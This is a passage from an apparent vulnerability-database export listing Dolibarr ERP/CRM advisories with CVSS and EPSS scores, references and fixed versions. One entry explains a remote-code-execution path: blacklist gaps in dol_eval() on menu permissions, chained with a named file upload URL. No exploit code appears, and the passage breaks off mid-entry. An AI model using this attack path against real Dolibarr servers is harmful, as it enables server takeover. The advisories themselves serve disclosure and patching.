scoring_system epss
scoring_elements 0.82813
published_at 2026-06-04T12:55:00Z
1
value 0.01735
scoring_system epss
scoring_elements 0.82835
published_at 2026-06-07T12:55:00Z
2
value 0.01735
scoring_system epss
scoring_elements 0.82838
published_at 2026-06-06T12:55:00Z
3
value 0.01735
scoring_system epss
scoring_elements 0.82839
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0819
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075
3
reference_url https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0819
reference_id CVE-2022-0819
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0819
5
reference_url https://github.com/advisories/GHSA-42qm-c3cf-9wv2
reference_id GHSA-42qm-c3cf-9wv2
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-42qm-c3cf-9wv2
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.1
purl pkg:composer/dolibarr/dolibarr@15.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-8fjr-6hdm-vqdd
7
vulnerability VCID-d4uk-4adf-mba9
8
vulnerability VCID-ewrf-wdsh-kqgs
9
vulnerability VCID-f122-u34a-kfcm
10
vulnerability VCID-htgn-37m4-c7fu
11
vulnerability VCID-j345-dk2c-yfds
12
vulnerability VCID-jbkd-su9m-3udy
13
vulnerability VCID-k9nc-tze6-k7bx
14
vulnerability VCID-mpmz-eh21-nkcm
15
vulnerability VCID-pfyf-s4fc-d3a8
16
vulnerability VCID-s3xn-47cy-eucf
17
vulnerability VCID-srth-2stq-gyaq
18
vulnerability VCID-tmv2-39y8-f7f1
19
vulnerability VCID-tsbf-m4eq-gbgp
20
vulnerability VCID-vp4z-qpc7-uug1
21
vulnerability VCID-vwxd-syyk-jueh
22
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.1
aliases CVE-2022-0819, GHSA-42qm-c3cf-9wv2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7qjh-teat-tqav
8
url VCID-8fjr-6hdm-vqdd
vulnerability_id VCID-8fjr-6hdm-vqdd
summary
Dolibarr user with permission to edit PHP content can bypass filtering to restrict dangerous PHP functions
In the Website module of Dolibarr ERP & CRM 22.0.4 and below, the application uses blacklist-based filtering to restrict dangerous PHP functions related to system command execution. An authenticated user with permission to edit PHP content can bypass this filtering, resulting in full remote code execution with the ability to execute arbitrary operating system commands on the server.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-31019
reference_id
reference_type
scores
0
value 0.00119
scoring_system epss
scoring_elements 0.30504
published_at 2026-06-05T12:55:00Z
1
value 0.00119
scoring_system epss
scoring_elements 0.30441
published_at 2026-06-07T12:55:00Z
2
value 0.00119
scoring_system epss
scoring_elements 0.30471
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-31019
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/
url https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-31019
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-31019
5
reference_url https://github.com/advisories/GHSA-j2g9-rprv-hrhc
reference_id GHSA-j2g9-rprv-hrhc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j2g9-rprv-hrhc
fixed_packages
aliases CVE-2026-31019, GHSA-j2g9-rprv-hrhc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8fjr-6hdm-vqdd
9
url VCID-d4uk-4adf-mba9
vulnerability_id VCID-d4uk-4adf-mba9
summary
Dolibarr Improper Input Validation vulnerability
Improper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an unauthorized authenticated user to read a database table containing customer data
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-4198
reference_id
reference_type
scores
0
value 0.00079
scoring_system epss
scoring_elements 0.23625
published_at 2026-06-05T12:55:00Z
1
value 0.00079
scoring_system epss
scoring_elements 0.23562
published_at 2026-06-07T12:55:00Z
2
value 0.00079
scoring_system epss
scoring_elements 0.23608
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-4198
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb
3
reference_url https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/
url https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b
4
reference_url https://starlabs.sg/advisories/23/23-4198
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/
url https://starlabs.sg/advisories/23/23-4198
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-4198
reference_id CVE-2023-4198
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-4198
6
reference_url https://github.com/advisories/GHSA-48v2-596x-4jr9
reference_id GHSA-48v2-596x-4jr9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-48v2-596x-4jr9
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@18.0.0
purl pkg:composer/dolibarr/dolibarr@18.0.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0
aliases CVE-2023-4198, GHSA-48v2-596x-4jr9
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d4uk-4adf-mba9
10
url VCID-egxz-r3nw-xffm
vulnerability_id VCID-egxz-r3nw-xffm
summary
Incorrect Authorization
Improper Access Control (IDOR) in GitHub repository dolibarr/dolibarr prior to 16.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0731
reference_id
reference_type
scores
0
value 0.00135
scoring_system epss
scoring_elements 0.33076
published_at 2026-06-04T12:55:00Z
1
value 0.00135
scoring_system epss
scoring_elements 0.33154
published_at 2026-06-07T12:55:00Z
2
value 0.00135
scoring_system epss
scoring_elements 0.33193
published_at 2026-06-06T12:55:00Z
3
value 0.00135
scoring_system epss
scoring_elements 0.33179
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0731
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a
3
reference_url https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0731
reference_id CVE-2022-0731
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0731
5
reference_url https://github.com/advisories/GHSA-4xc7-x2jr-cr74
reference_id GHSA-4xc7-x2jr-cr74
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4xc7-x2jr-cr74
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@16.0.0
purl pkg:composer/dolibarr/dolibarr@16.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-49k5-kwjc-z3hd
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0
aliases CVE-2022-0731, GHSA-4xc7-x2jr-cr74
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-egxz-r3nw-xffm
11
url VCID-ewrf-wdsh-kqgs
vulnerability_id VCID-ewrf-wdsh-kqgs
summary
Dolibarr allows a remote privileged attacker to execute arbitrary code via a crafted command/script
An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/
url http://dolibarr.com
1
reference_url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/
url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-38886
reference_id
reference_type
scores
0
value 0.50447
scoring_system epss
scoring_elements 0.97898
published_at 2026-06-05T12:55:00Z
1
value 0.50447
scoring_system epss
scoring_elements 0.97899
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-38886
3
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-38886
reference_id CVE-2023-38886
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-38886
5
reference_url https://github.com/advisories/GHSA-6773-rfjv-c54w
reference_id GHSA-6773-rfjv-c54w
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6773-rfjv-c54w
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@17.0.1
purl pkg:composer/dolibarr/dolibarr@17.0.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1
aliases CVE-2023-38886, GHSA-6773-rfjv-c54w
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ewrf-wdsh-kqgs
12
url VCID-f122-u34a-kfcm
vulnerability_id VCID-f122-u34a-kfcm
summary
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 16.0.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-5842
reference_id
reference_type
scores
0
value 0.0012
scoring_system epss
scoring_elements 0.30452
published_at 2026-06-07T12:55:00Z
1
value 0.0012
scoring_system epss
scoring_elements 0.30481
published_at 2026-06-06T12:55:00Z
2
value 0.0012
scoring_system epss
scoring_elements 0.30515
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-5842
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/
url https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c
3
reference_url https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/
url https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-5842
reference_id CVE-2023-5842
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-5842
5
reference_url https://github.com/advisories/GHSA-9pjf-jw9q-fx49
reference_id GHSA-9pjf-jw9q-fx49
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9pjf-jw9q-fx49
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@16.0.5
purl pkg:composer/dolibarr/dolibarr@16.0.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.5
aliases CVE-2023-5842, GHSA-9pjf-jw9q-fx49
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f122-u34a-kfcm
13
url VCID-g3x8-rhqm-fuh2
vulnerability_id VCID-g3x8-rhqm-fuh2
summary
Improper Input Validation
dolibarr is vulnerable to Business Logic Errors
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0174
reference_id
reference_type
scores
0
value 0.00244
scoring_system epss
scoring_elements 0.47826
published_at 2026-06-04T12:55:00Z
1
value 0.00244
scoring_system epss
scoring_elements 0.47876
published_at 2026-06-07T12:55:00Z
2
value 0.00244
scoring_system epss
scoring_elements 0.47893
published_at 2026-06-06T12:55:00Z
3
value 0.00244
scoring_system epss
scoring_elements 0.47889
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0174
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32
3
reference_url https://huntr.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0174
reference_id CVE-2022-0174
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0174
5
reference_url https://github.com/advisories/GHSA-8qvx-f5gf-g43v
reference_id GHSA-8qvx-f5gf-g43v
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8qvx-f5gf-g43v
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.0
purl pkg:composer/dolibarr/dolibarr@15.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-7qjh-teat-tqav
7
vulnerability VCID-8fjr-6hdm-vqdd
8
vulnerability VCID-d4uk-4adf-mba9
9
vulnerability VCID-egxz-r3nw-xffm
10
vulnerability VCID-ewrf-wdsh-kqgs
11
vulnerability VCID-f122-u34a-kfcm
12
vulnerability VCID-htgn-37m4-c7fu
13
vulnerability VCID-j345-dk2c-yfds
14
vulnerability VCID-jbkd-su9m-3udy
15
vulnerability VCID-k9nc-tze6-k7bx
16
vulnerability VCID-mpmz-eh21-nkcm
17
vulnerability VCID-pfyf-s4fc-d3a8
18
vulnerability VCID-rqux-jkta-4kfj
19
vulnerability VCID-s3xn-47cy-eucf
20
vulnerability VCID-srth-2stq-gyaq
21
vulnerability VCID-tmv2-39y8-f7f1
22
vulnerability VCID-tsbf-m4eq-gbgp
23
vulnerability VCID-vp4z-qpc7-uug1
24
vulnerability VCID-vwxd-syyk-jueh
25
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0
aliases CVE-2022-0174, GHSA-8qvx-f5gf-g43v
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g3x8-rhqm-fuh2
14
url VCID-htgn-37m4-c7fu
vulnerability_id VCID-htgn-37m4-c7fu
summary
Dolibarr Allows Code Injection through its Website Module
In Dolibarr ERP & CRM <= 22.0.4, PHP code detection and editing permission enforcement in the Website module is not applied consistently to all input parameters, allowing an authenticated user restricted to HTML/JavaScript editing to inject PHP code through unprotected inputs during website page creation.

A patch is available at https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-31018
reference_id
reference_type
scores
0
value 0.00049
scoring_system epss
scoring_elements 0.15516
published_at 2026-06-05T12:55:00Z
1
value 0.00049
scoring_system epss
scoring_elements 0.15468
published_at 2026-06-07T12:55:00Z
2
value 0.00049
scoring_system epss
scoring_elements 0.15508
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-31018
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96
4
reference_url https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0
5
reference_url https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/
url https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-31018
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-31018
7
reference_url https://github.com/advisories/GHSA-676v-wh57-p375
reference_id GHSA-676v-wh57-p375
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-676v-wh57-p375
fixed_packages
aliases CVE-2026-31018, GHSA-676v-wh57-p375
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-htgn-37m4-c7fu
15
url VCID-j345-dk2c-yfds
vulnerability_id VCID-j345-dk2c-yfds
summary
Dolibarr has Remote Code Execution Vulnerability (Bypass)
The Dolibarr backend provides the function of adding Menu, and supports setting permissions for the added Menu:

![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164114688.png)

This is the trigger point of the vulnerability. The submitted permission can be php code, and it will be executed when viewing the created Menu:

- htdocs/admin/menus/edit.php

![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164445656.png)

As you can see, in edit.php, if the created menu is set to `$menu->perms`, the `dol_eval()` method will be called. Following the `dol_eval()` method, we can see that it will filter the dangerous php functions in `$menu->perms` through the `blacklist` set in `$forbiddenphpfunctions`:

![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164725548.png)

However, the `blacklist` here is not comprehensive. For example, the `include_once` and `require_once` functions can easily pass the `blacklist` check, which will cause file inclusion vulnerabilities. Moreover, if the `allow_url_include` option is enabled in php.ini, arbitrary code execution will occur. **The most serious thing is that we can combine this with the file upload at `/htdocs/user/document.php?id=1&uploadform=1` to achieve more general arbitrary code execution.**
references
0
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
1
reference_url https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php
2
